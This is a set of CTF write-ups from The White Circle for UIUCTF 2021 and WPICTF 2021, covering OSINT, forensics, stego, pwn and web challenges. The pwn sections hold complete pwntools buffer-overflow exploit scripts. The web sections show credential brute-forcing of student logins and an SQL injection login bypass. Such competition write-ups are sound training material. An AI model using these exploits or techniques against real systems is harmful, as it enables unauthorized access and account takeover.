5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | parent: uiuctf_2021
8 | category: osint
9 | challenge: Chaplin's PR Nightmare - 6
10 | tags: "osint, choco"
11 | date: 2021-08-12T00:00:00+00:00
12 | last_modified_at: 2021-08-12T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : choco
17 |
18 | “Wow Charlie even set up a linkedin account, but not well it is kind of a mess. Is the PR nightmare here??
19 | The inner content of this flag begins with **"pr"**“
20 | This time you should go to linkedin to search up their name.
21 |
22 | I searched up “C3D” as specified from their website to get their profile
23 |
24 | https://www.linkedin.com/groups/13984825/
25 |
26 | Go to their owners page and under his profile he’ll mention “I ran a event called "**Top Hat Development Night**". It was very cool, you can find it on linkedin still search it up”
27 |
28 | Search up "**Top Hat Development Night**" under events and you’ll get the event and flag under it
29 |
30 | https://www.linkedin.com/events/6822753659445743616/
31 |
32 |
33 | Flag: uiuctf{pr0f3s5iOn@l_bUs1n3sS_envIroNm3n7}
34 |
35 |
36 |
--------------------------------------------------------------------------------
/uiuctf_2021/osint/ChaplinsPRNightmare7.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Uiuctf 2021 | Chaplin's PR Nightmare - 7 Writeup
4 | desc: Check out our writeup for Chaplin's PR Nightmare - 7 for Uiuctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | parent: uiuctf_2021
8 | category: osint
9 | challenge: Chaplin's PR Nightmare - 7
10 | tags: "osint, choco"
11 | date: 2021-08-12T00:00:00+00:00
12 | last_modified_at: 2021-08-12T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : choco
17 |
18 | “Chaplin left some code up on GitHub which may be the actual PR nightmare I hope not though... Leaked code is bad. Find it!!!
19 | The inner content of this flag begins with **"th"**”
20 |
21 | Now this time search up “Charlie Chaplin” and there should be only 4 results under user
22 | you’ll figure out the profile under https://github.com/charliechaplindev
23 |
24 | Scroll down their history and you’ll see an issue stating “ [SECRET KEY SECRET KEY THIS IS BAD THIS IS BAD](https://github.com/charliechaplindev/C3D-Official/issues/3)” Click on that and you’ll get the flag
25 |
26 |
27 | Flag: uiuctf{th3_TrUe_pR_N1gHtm@r3}
28 |
29 |
30 |
--------------------------------------------------------------------------------
/uiuctf_2021/osint/OSINTTheCreator.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Uiuctf 2021 | OSINT The Creator Writeup
4 | desc: Check out our writeup for OSINT The Creator for Uiuctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | parent: uiuctf_2021
8 | category: osint
9 | challenge: OSINT The Creator
10 | tags: "osint, choco"
11 | date: 2021-08-12T00:00:00+00:00
12 | last_modified_at: 2021-08-12T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : choco
17 |
18 | “There is a flag on a few of the organizer's profiles. Find it!”
19 |
20 | One of the most prominent organiser is thomas
21 | Search his username on discord in the uiuctf server and you’ll get the flag under his profile (it is a spoiler)
22 |
23 |
24 | Flag: uiuctf{@b0uT_m3_suppOrT5_maRkD0wN}
25 |
26 |
27 |
--------------------------------------------------------------------------------
/uiuctf_2021/pwn.md:
--------------------------------------------------------------------------------
1 | # pwn
2 |
3 | ## pwn warmup
4 | > Solved by : thewhiteh4t
5 |
6 |
7 | #!/usr/bin/python3
8 |
9 | from pwn import *
10 |
11 | host = 'pwn-warmup.chal.uiuc.tf'
12 | port = 1337
13 | offset = 20
14 | addr = 0
15 |
16 | junk = b'A' * offset
17 |
18 | conn = remote(host, port)
19 | lines = conn.recvuntil('ad\n').decode().split('\n')
20 | addr = lines[2].split(' = ')[1].strip()
21 | addr = int(addr, 16)
22 | le_num = p64(addr)
23 | buffer = junk + le_num
24 | conn.sendline(buffer)
25 | flag = conn.recvuntil('}').decode()
26 | print(flag)
27 |
28 |
29 |
30 | 
31 |
32 |
33 |
--------------------------------------------------------------------------------
/uiuctf_2021/pwn/pwnwarmup.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Uiuctf 2021 | pwn warmup Writeup
4 | desc: Check out our writeup for pwn warmup for Uiuctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Uiuctf 2021
7 | parent: uiuctf_2021
8 | category: pwn
9 | challenge: pwn warmup
10 | tags: "pwn, twh"
11 | date: 2021-08-12T00:00:00+00:00
12 | last_modified_at: 2021-08-12T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : thewhiteh4t
17 |
18 |
19 | #!/usr/bin/python3
20 |
21 | from pwn import *
22 |
23 | host = 'pwn-warmup.chal.uiuc.tf'
24 | port = 1337
25 | offset = 20
26 | addr = 0
27 |
28 | junk = b'A' * offset
29 |
30 | conn = remote(host, port)
31 | lines = conn.recvuntil('ad\n').decode().split('\n')
32 | addr = lines[2].split(' = ')[1].strip()
33 | addr = int(addr, 16)
34 | le_num = p64(addr)
35 | buffer = junk + le_num
36 | conn.sendline(buffer)
37 | flag = conn.recvuntil('}').decode()
38 | print(flag)
39 |
40 |
41 |
42 | 
43 |
44 |
45 |
--------------------------------------------------------------------------------
/wpictf_2021/README.md:
--------------------------------------------------------------------------------
1 | # WPICTF 2021
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve, this is not a complete list.
6 |
7 | * [Forensics](forensics.md)
8 | * [Misc](misc.md)
9 | * [Web](web.md)
10 | * [Reverse Engineering](re.md)
11 | * [Pwn](pwn.md)
12 | * [Stego](stego.md)
--------------------------------------------------------------------------------
/wpictf_2021/forensics/Holmes.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Wpictf 2021 | Holmes Writeup
4 | desc: Check out our writeup for Holmes for Wpictf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Wpictf 2021
7 | parent: wpictf_2021
8 | category: forensics
9 | challenge: Holmes
10 | tags: "forensics, starry"
11 | date: 2021-04-26T00:00:00+00:00
12 | last_modified_at: 2021-04-26T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : Starry-Lord
18 |
19 | * the challenge gives us the following string
20 |
21 | ```
22 | Z29vZCB0aG91Z2h0LCBidXQgbm8u
23 | ```
24 |
25 | * it looks base64 , however base64 decoder shows the following:
26 |
27 | ```
28 | good thought, but no.
29 | ```
30 |
31 | * using `Sherlock` OSINT tool we found this github repository :
32 |
33 | ```
34 | https://github.com/Z29vZCB0aG91Z2h0LCBidXQgbm8u/flag/blob/main/README.md
35 | ```
36 |
37 | ```
38 | WPI{sh3rlock_holmes_w0uld_be_pr0ud}
39 | ```
--------------------------------------------------------------------------------
/wpictf_2021/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | WPICTF 2021
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Wpictf 2021
7 | ---
--------------------------------------------------------------------------------
/wpictf_2021/pwn.md:
--------------------------------------------------------------------------------
1 | # pwn
2 |
3 | ## $m4$h
4 |
5 | > Solved by : thewhiteh4t
6 |
7 | ```python
8 | #!/usr/bin/env python3
9 |
10 | from pwn import *
11 |
12 | host = 'smash184384.wpictf.xyz'
13 | port = 15724
14 |
15 | junk = 'A' * 11
16 | num = 923992130
17 |
18 | le_num = p32(num, endianness='little')
19 | buffer = junk.encode() + le_num + '\n'.encode()
20 |
21 | conn = remote(host, port)
22 | conn.send(buffer)
23 | flag = conn.recvline().decode().split(': ')[1].strip()
24 | print(f'\nFLAG : {flag}\n')
25 | conn.close()
26 | ```
--------------------------------------------------------------------------------
/wpictf_2021/pwn/m4h.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Wpictf 2021 | $m4$h Writeup
4 | desc: Check out our writeup for $m4$h for Wpictf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Wpictf 2021
7 | parent: wpictf_2021
8 | category: pwn
9 | challenge: $m4$h
10 | tags: "pwn, twh"
11 | date: 2021-04-26T00:00:00+00:00
12 | last_modified_at: 2021-04-26T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 | ```python
20 | #!/usr/bin/env python3
21 |
22 | from pwn import *
23 |
24 | host = 'smash184384.wpictf.xyz'
25 | port = 15724
26 |
27 | junk = 'A' * 11
28 | num = 923992130
29 |
30 | le_num = p32(num, endianness='little')
31 | buffer = junk.encode() + le_num + '\n'.encode()
32 |
33 | conn = remote(host, port)
34 | conn.send(buffer)
35 | flag = conn.recvline().decode().split(': ')[1].strip()
36 | print(f'\nFLAG : {flag}\n')
37 | conn.close()
38 | ```
--------------------------------------------------------------------------------
/wpictf_2021/stego/Suspicioustraffic.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Wpictf 2021 | Suspicious traffic Writeup
4 | desc: Check out our writeup for Suspicious traffic for Wpictf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Wpictf 2021
7 | parent: wpictf_2021
8 | category: stego
9 | challenge: Suspicious traffic
10 | tags: "stegano, twh, pcap, tshark"
11 | date: 2021-04-26T00:00:00+00:00
12 | last_modified_at: 2021-04-26T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 | * we are given a pcapng file with some HTTP traffic
20 | * some of the requests have extra characters in data field
21 | * they can be listed using tshark easily
22 |
23 | ```bash
24 | tshark -r capture.pcapng -T fields -e http.file_data | grep "\S" | grep -v "html" | cut -d "\\" -f 1 | tr -d "\n"
25 | ```
26 |
27 | ```
28 | WPI{su3p1ci0uS_htTp}
29 | ```
--------------------------------------------------------------------------------
/wpictf_2021/web/wpiadmin.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Wpictf 2021 | wpi admin Writeup
4 | desc: Check out our writeup for wpi admin for Wpictf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Wpictf 2021
7 | parent: wpictf_2021
8 | category: web
9 | challenge: wpi admin
10 | tags: "web, twh"
11 | date: 2021-04-26T00:00:00+00:00
12 | last_modified_at: 2021-04-26T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 | * email of our friend : alexo@uupeye.edu
20 | * “students” here have some “bad” passwords
21 | * emails of students are visible on : https://wpiadmin.wpictf.xyz/topStudents
22 | * so we get a list of emails which we can bruteforce on student login!
23 |
24 | ```
25 | colino@uupeye.edu
26 | calliep@uupeye.edu
27 | annar@uupeye.edu
28 | gaylenek@uupeye.edu
29 | dennisb@uupeye.edu
30 | sherrim@uupeye.edu
31 | adams@uupeye.edu
32 | ```
33 |
34 | * after bruteforcing we get all these credentials
35 |
36 | ```
37 | colino@uupeye.edu:123456
38 | calliep@uupeye.edu:password
39 | annar@uupeye.edu:iloveyou
40 | gaylenek@uupeye.edu:qwerty
41 | dennisb@uupeye.edu:123123
42 | sherrim@uupeye.edu:12345678
43 | adams@uupeye.edu:soccer
44 | ```
45 |
46 | * after checking each profile we get flag on `dennisb@uupeye.edu`
47 |
48 | 
49 |
50 |
--------------------------------------------------------------------------------
/wpictf_2021/web/wpiadmin2.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Wpictf 2021 | wpi admin 2 Writeup
4 | desc: Check out our writeup for wpi admin 2 for Wpictf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Wpictf 2021
7 | parent: wpictf_2021
8 | category: web
9 | challenge: wpi admin 2
10 | tags: "web, twh, sql, sqli"
11 | date: 2021-04-26T00:00:00+00:00
12 | last_modified_at: 2021-04-26T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 | * we login as dennisb@uupeye.edu again
20 | * In student communication we get the link to admin portal : https://wpiadmin.wpictf.xyz/iyghfihGBKHJF9719fn113
21 | * Bruteforcing did not work so I tried SQL login bypass using burpsuite
22 |
23 | ```
24 | admin@uupeye.edu' or '1'='1
25 | ```
26 |
27 | 
28 |
29 | * Bypass is successful and we get the link for admin portal!
30 |
31 | 
32 |
33 |
--------------------------------------------------------------------------------